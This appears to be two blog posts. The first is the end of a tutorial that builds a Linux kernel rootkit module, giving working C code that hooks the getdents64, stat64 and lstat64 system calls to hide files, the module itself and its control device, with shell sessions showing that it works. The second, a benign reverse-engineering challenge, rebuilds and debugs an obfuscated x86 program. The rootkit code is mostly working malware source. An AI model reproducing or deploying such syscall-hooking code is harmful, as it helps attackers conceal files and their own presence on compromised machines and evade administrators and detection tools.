app    cdev.c  cdev.o    functs.h  hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.o")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt

As you can see, we are now able to hide and unhide files on demand, there is, however, still a problem:

root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# ls thisisatestfile.txt
thisisatestfile.txt

Hiding Files Better

Now let's hide the files even when they are queried directly.

To figure out how to do this we will use the same method as we did when figuring out how to hide files to being with, by looking at the system calls that are being made and hooking them.

We will start by determining the system calls responsible for this:

root@dev:~/lkms/hidefiles# strace ls thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
execve("/bin/ls", ["ls", "thisisatestfile.txt"], [/* 18 vars */]) = 0
stat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "thisisatestfile.txt\n", 20thisisatestfile.txt

I've grepped for the filename because the system call must be querying the filename directly, we've found 2 (stat64 and lstat64).

It looks like it returns 0 when its successful, let's see what happens when its unsuccessful:

root@dev:~/lkms/hidefiles# strace ls thisisnotafile.txt 2>&1 | grep 'thisisnotafile.txt'
execve("/bin/ls", ["ls", "thisisnotafile.txt"], [/* 18 vars */]) = 0
stat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
lstat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
write(2, "cannot access thisisnotafile.txt", 32cannot access thisisnotafile.txt) = 32

So they return -ENOENT if the file does not exist.

Another thing to note about this output is that the second argument to both stat64 and lstat64 is a pointer to a buffer which on a success is populated by the system call and obviously left blank in a failure.

The manpage for these functions confirms that:

1 2	`int stat(const char path, struct stat buf);` int lstat(const char path, struct stat buf);

We don't care too much about the stat struct because if it matches any of our hidden files we will just return -ENOENT and otherwise we will forward the request to the original system call.

If we wanted to actually manipulate the results that applications got back from these systems calls, we could use this structure to do so.

One more thing to check is what the request looks like when a full path is given:

root@dev:~/lkms/hidefiles# strace ls ~/lkms/hidefiles/thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
stat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "/root/lkms/hidefiles/thisisatest"..., 41/root/lkms/hidefiles/thisisatestfile.txt

So the full path is passed to the system call, we will have to deal with this because obviously we only have a list of filenames so we will have to manually extract the actual filename to check against our list.

First let's write the function which extracts the filename from the full path and checks if it is in the list:

int extractfilename(const char *f)
{
    int i, n, c;
    size_t l;
    l = strlen(f);

    for(i = l-1, n = 0; i>=0; i--, n++){
        if(f[i] == '/'){
            i = -1;
            break;
        }
    }

    if(i == -1)
        c = n+1;
    else
        c = l;

    char s[c];
    memset(s, 0, c);

    for(i = 0; n>0; i++, n--)
        s[i] = f[l-n];

    return lookupfilename(s);
}

We need to add the prototype in list.h so that the other files can use it:

#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);
int extractfilename(const char *f);

#endif

Now for the system calls, this should be added to syscalls.c:

asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

asmlinkage int stat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_stat64(path, buf);
}

asmlinkage int lstat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_lstat64(path, buf);
}

And we need to update syscalls.h:

#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/stat.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
asmlinkage int stat64_hook(const char *path, struct stat64 *buf);
asmlinkage int lstat64_hook(const char *path, struct stat64 *buf);
extern asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
extern asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

#endif

We need to include linux/stat.h because that includes the declaration of the stat64 structure.

And lastly we need to update main.c to hook and unhook these 2 syscalls on load/unload:

#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];
    original_stat64 = sys_call_table[__NR_stat64];
    original_lstat64 = sys_call_table[__NR_lstat64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    sys_call_table[__NR_stat64] = stat64_hook;
    sys_call_table[__NR_lstat64] = lstat64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("hidefiles");
    addfile("hidefiles.ko");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    sys_call_table[__NR_stat64] = original_stat64;
    sys_call_table[__NR_lstat64] = original_lstat64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've changed the files that it automatically hides when loaded to hidefiles (which is the name of the character device file) and hidefiles.ko (which is the name of the LKM) because this is more useful, in reality these would be named something less descriptive and the other source files wouldn't be there.

Finally to test it:

root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:19:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
/root/lkms/hidefiles/list.c: In function ‘extractfilename’:
/root/lkms/hidefiles/list.c:110:2: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:51:1: warning: the frame size of 1032 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls -l
total 852
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root 278101 Nov  5 20:41 hidefiles.ko
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls -l
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# ls -l /dev/hidefiles
ls: cannot access /dev/hidefiles: No such file or directory
root@dev:~/lkms/hidefiles# ls -l hidefiles.ko
ls: cannot access hidefiles.ko: No such file or directory
root@dev:~/lkms/hidefiles# ls -l ~/lkms/hidefiles/hidefiles.ko
ls: cannot access /root/lkms/hidefiles/hidefiles.ko: No such file or directory
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.c")'
root@dev:~/lkms/hidefiles# ls -l list.c
ls: cannot access list.c: No such file or directory
root@dev:~/lkms/hidefiles# ls
app     functs.c         hidefiles.o  Makefile        syscalls.o
app.c   functs.h         list.h       modules.order   thisisatestfile.txt
cdev.c  functs.o         list.o       Module.symvers
cdev.h  hidefiles.mod.c  main.c       syscalls.c
cdev.o  hidefiles.mod.o  main.o       syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.h")'
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.o")'
root@dev:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.mod.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.o  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.o      modules.order   syscalls.o
cdev.h  functs.o  main.c           Module.symvers  thisisatestfile.txt
root@dev:~/lkms/hidefiles# for f in `ls`; do python -c "open('/dev/hidefiles', 'w').write(\"a:$f\")"; done
root@dev:~/lkms/hidefiles# ls
root@dev:~/lkms/hidefiles# ls -l
total 0
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:list.o")'
root@dev:~/lkms/hidefiles# ls
list.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.ko     list.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.c  list.h  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.mod.o  list.o  modules.order   syscalls.o
cdev.h  functs.o  hidefiles.o      main.c  Module.symvers  thisisatestfile.txt

Funnily enough this also hides directories with a name that is in the list but doesn't stop you from cd'ing there:

root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# cd ..
root@dev:~/lkms# ls -l
total 720
-rw-r--r-- 1 root root    380 May 12 19:47 hello.c
-rw-r--r-- 1 root root  74389 Jul 11 17:54 hello.ko
-rw-r--r-- 1 root root    659 Jul 11 17:54 hello.mod.c
-rw-r--r-- 1 root root  42436 Jul 11 17:54 hello.mod.o
-rw-r--r-- 1 root root  32960 Jul 11 17:53 hello.o
-rw-r--r-- 1 root root   2080 Jul 11 18:18 hidefile.c
-rw-r--r-- 1 root root 122949 Jul 11 18:18 hidefile.ko
-rw-r--r-- 1 root root    810 Jul 11 17:54 hidefile.mod.c
-rw-r--r-- 1 root root  42636 Jul 11 17:54 hidefile.mod.o
-rw-r--r-- 1 root root  81320 Jul 11 18:18 hidefile.o
-rw-r--r-- 1 root root    195 Jul 11 17:51 Makefile
-rw-r--r-- 1 root root     86 Jul 11 18:18 modules.order
-rw-r--r-- 1 root root      0 May 12 19:35 Module.symvers
-rwxr-xr-x 1 root root   6107 Jun  4 21:04 reverse_app
-rwxr-xr-x 1 root root   6135 Jun  9 23:21 reverse-app
-rwxr-xr-x 1 root root   6140 Jun  9 23:41 reverse-app2
-rw-r--r-- 1 root root    899 Jun  9 23:41 reverse-app2.c
-rw-r--r-- 1 root root    899 Jun  9 23:14 reverse-app.c
-rw-r--r-- 1 root root   2013 Jun  9 22:49 reverse.c
-rw-r--r-- 1 root root 119395 Jul 11 17:54 reverse.ko
-rw-r--r-- 1 root root   1019 Jul 11 17:54 reverse.mod.c
-rw-r--r-- 1 root root  42888 Jul 11 17:54 reverse.mod.o
-rw-r--r-- 1 root root  77532 Jul 11 17:53 reverse.o
-rwxr-xr-x 1 root root   6587 Jun  9 22:25 reverse-test-app
-rw-r--r-- 1 root root    987 Jun  9 22:16 reverse-test-app.c
-rw-r--r-- 1 root root      0 Jul 11 18:18 thisisatestfile.txt
root@dev:~/lkms# ls -l hidefiles
ls: cannot access hidefiles: No such file or directory
root@dev:~/lkms# ls -l hidefiles/
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms# cd hidefiles
root@dev:~/lkms/hidefiles#

Anyway, our improved rootkit seems to work nicely and as expected.

It is still currently easy to detect our rootkit though:

1 2	`root@dev:~/lkms/hidefiles# lsmod \| grep hide` hidefiles 12763 0

You can get the full finished source code for the rootkit here.

Conclusion

We have used a number of techniques here to figure out how to hide files on the system and we have combined all of the knowledge we have gained to far to achieve this.

However, there are still a lot of ways we can improve this LKM, hiding the LKM's existence, and using the network to communicate are just a couple (we will take these up later).

When dealing with kernel code you have to be very careful as you can break the whole system, this is evident with the first character device that we created (just load the device and write 5000 bytes to it, the system will crash instantly).

Happy Kernel Hacking :-)

Reversing A Simple Obfuscated Application

eXploit

By: 0xe7

30 September 2014 at 20:43

I created this application as a little challenge and some practice at manually obfuscating an application at the assembly level.

I wrote the application in IA32 assembly and then manually obfuscated it using a couple of different methods.

Here I will show how to solve the challenge in 2 different ways.

Lastly I will show how the obfuscation could have been done better so that it would have been a lot more difficult to solve this using a simple static disassembly.

The Challenge

We are given the static disassembly below of a 32bit linux application which says whether or not the author is going to some event:

./going-or-not-obf:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:   89 c2                   mov    edx,eax
 8048062:   bf 25 00 00 00          mov    edi,0x25
 8048067:   eb 4d                   jmp    0x80480b6
 8048069:   b3 32                   mov    bl,0x32
 804806b:   5e                      pop    esi
 804806c:   31 c0                   xor    eax,eax
 804806e:   74 6c                   je     0x80480dc
 8048070:   b7 6a                   mov    bh,0x6a
 8048072:   e8 17 00 00 00          call   0x804808e
 8048077:   b1 04                   mov    cl,0x4
 8048079:   8a 06                   mov    al,BYTE PTR [esi]
 804807b:   29 cc                   sub    esp,ecx
 804807d:   41                      inc    ecx
 804807e:   30 c8                   xor    al,cl
 8048080:   31 c9                   xor    ecx,ecx
 8048082:   83 f8 04                cmp    eax,0x4
 8048085:   74 12                   je     0x8048099
 8048087:   8d 4d f1                lea    ecx,[ebp-0xf]
 804808a:   b2 10                   mov    dl,0x10
 804808c:   eb 09                   jmp    0x8048097
 804808e:   31 db                   xor    ebx,ebx
 8048090:   31 c9                   xor    ecx,ecx
 8048092:   89 ca                   mov    edx,ecx
 8048094:   ff 24 24                jmp    DWORD PTR [esp]
 8048097:   eb 05                   jmp    0x804809e
 8048099:   8d 4d e5                lea    ecx,[ebp-0x1b]
 804809c:   b2 0c                   mov    dl,0xc
 804809e:   31 c0                   xor    eax,eax
 80480a0:   b0 08                   mov    al,0x8
 80480a2:   bb 04 00 00 00          mov    ebx,0x4
 80480a7:   29 d8                   sub    eax,ebx
 80480a9:   29 c3                   sub    ebx,eax
 80480ab:   43                      inc    ebx
 80480ac:   cd 80                   int    0x80
 80480ae:   31 c0                   xor    eax,eax
 80480b0:   31 db                   xor    ebx,ebx
 80480b2:   fe c0                   inc    al
 80480b4:   cd 80                   int    0x80
 80480b6:   e8 ae ff ff ff          call   0x8048069
 80480bb:   ed                      in     eax,dx
 80480bc:   4e                      dec    esi
 80480bd:   65 23 2a                and    ebp,DWORD PTR gs:[edx]
 80480c0:   2d 2b 23 64 30          sub    eax,0x3064232b
 80480c5:   2b 2a                   sub    ebp,DWORD PTR [edx]
 80480c7:   64 29 25 64 0d 4e 65    sub    DWORD PTR fs:0x654e0d64,esp
 80480ce:   23 2a                   and    ebp,DWORD PTR [edx]
 80480d0:   2d 2b 23 64 29          sub    eax,0x2964232b
 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   89 c5                   mov    ebp,eax
 80480dc:   b0 c9                   mov    al,0xc9
 80480de:   01 f8                   add    eax,edi
 80480e0:   eb 1f                   jmp    0x8048101
 80480e2:   8d 55 00                lea    edx,[ebp+0x0]
 80480e5:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e8:   4c                      dec    esp
 80480e9:   68 e9 80 04 08          push   0x80480e9
 80480ee:   85 d2                   test   edx,edx
 80480f0:   38 02                   cmp    BYTE PTR [edx],al
 80480f2:   0f 84 78 ff ff ff       je     0x8048070
 80480f8:   89 fb                   mov    ebx,edi
 80480fa:   83 c3 1f                add    ebx,0x1f
 80480fd:   30 1a                   xor    BYTE PTR [edx],bl
 80480ff:   4a                      dec    edx
 8048100:   c3                      ret    
 8048101:   31 ed                   xor    ebp,ebp
 8048103:   31 c9                   xor    ecx,ecx
 8048105:   31 d2                   xor    edx,edx
 8048107:   42                      inc    edx
 8048108:   8d 2c 0c                lea    ebp,[esp+ecx*1]
 804810b:   8a 0c 16                mov    cl,BYTE PTR [esi+edx*1]
 804810e:   38 c1                   cmp    cl,al
 8048110:   74 d0                   je     0x80480e2
 8048112:   88 0c 24                mov    BYTE PTR [esp],cl
 8048115:   83 ec 01                sub    esp,0x1
 8048118:   42                      inc    edx
 8048119:   89 e4                   mov    esp,esp
 804811b:   83 f9 00                cmp    ecx,0x0
 804811e:   7f eb                   jg     0x804810b
 8048120:   89 ed                   mov    ebp,ebp
 8048122:   c3                      ret

The challenge is to figure out whether or not the author is going based solely on this static disassembly.

Method 1: The Easy Way

In this method we'll rebuild the application and simply run it to get the answer.

The first step is to copy the instruction into a new nasm file, if we do that we get:

global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    al,BYTE PTR [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    DWORD PTR [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    and    ebp,DWORD PTR gs:[edx]
    sub    eax,0x3064232b
    sub    ebp,DWORD PTR [edx]
    sub    DWORD PTR fs:0x654e0d64,esp
    and    ebp,DWORD PTR [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE PTR [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE PTR [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE PTR [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    cl,BYTE PTR [esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE PTR [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

When we try to assemble this we get:

root@dev:~# nasm -felf32 -o going-or-not-obf-test1 going-or-not-obf-test1.nasm going-or-not-obf-test1.nasm:16: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:29: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:47: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:49: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:50: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:51: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:59: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:63: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:67: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:75: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:78: error: comma, colon or end of line expected

Looking at the lines that have caused the errors:

root@dev:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test1.nasm | grep "^[ ]*$i"; done
    16      mov    al,BYTE PTR [esi]
    29      jmp    DWORD PTR [esp]
    47      and    ebp,DWORD PTR gs:[edx]
    49      sub    ebp,DWORD PTR [edx]
    50      sub    DWORD PTR fs:0x654e0d64,esp
    51      and    ebp,DWORD PTR [edx]
    59      mov    BYTE PTR [esp],cl
    63      cmp    BYTE PTR [edx],al
    67      xor    BYTE PTR [edx],bl
    75      mov    cl,BYTE PTR [esi+edx*1]
    78      mov    BYTE PTR [esp],cl

You can see that its all lines that have [SIZE] PTR, we will remove any DWORD PTR and BYTE PTR and for the lines that had BYTE put that before the first operand, so they end up like this:

root@dev:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test2.nasm | grep "^[ ]*$i"; done
    16      mov    BYTE al, [esi]
    29      jmp    [esp]
    47      and    ebp, gs:[edx]
    49      sub    ebp, [edx]
    50      sub    fs:0x654e0d64,esp
    51      and    ebp, [edx]
    59      mov    BYTE [esp],cl
    63      cmp    BYTE [edx],al
    67      xor    BYTE [edx],bl
    75      mov    BYTE cl,[esi+edx*1]
    78      mov    BYTE [esp],cl

Now we try to assemble it again:

1
2
3

root@dev:~# nasm -felf32 -o going-or-not-obf-test2 going-or-not-obf-test2.nasm  
going-or-not-obf-test2.nasm:47: error: invalid combination of opcode and operands
going-or-not-obf-test2.nasm:50: error: invalid combination of opcode and operands

So there is still a problem with 2 lines, it looks as if these instructions are invalid, this could possibly be data, what we shall do is replace these 2 instructions with the raw opcodes from the disassembly, so our application ends up like this:

global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

If we assemble this and test it out:

root@dev:~# nasm -felf32 -o going-or-not-obf-test3.o going-or-not-obf-test3.nasm 
root@dev:~# ld -o going-or-not-obf-test3 going-or-not-obf-test3.o
root@dev:~# ./going-or-not-obf-test3
Segmentation fault

So it assembles and links now but we get a segmentation fault. Let's investigate why:

root@dev:~# gdb -q ./going-or-not-obf-test3
Reading symbols from /root/going-or-not-obf-test3...(no debugging symbols found)...done.
(gdb) r
Starting program: /root/going-or-not-obf-test3 

Program received signal SIGSEGV, Segmentation fault.
0x080480b6 in _start ()
(gdb) x/i $eip
=> 0x80480b6 <_start+86>:   add    BYTE PTR [eax],al
(gdb) print/x $eax
$1 = 0x0
(gdb) disassemble 
Dump of assembler code for function _start:
   0x08048060 <+0>: mov    edx,eax
   0x08048062 <+2>: mov    edi,0x25
   0x08048067 <+7>: jmp    0x80480b6 <_start+86>
   0x0804806c <+12>:    mov    bl,0x32
   0x0804806e <+14>:    pop    esi
   0x0804806f <+15>:    xor    eax,eax
   0x08048071 <+17>:    je     0x80480dc <_start+124>
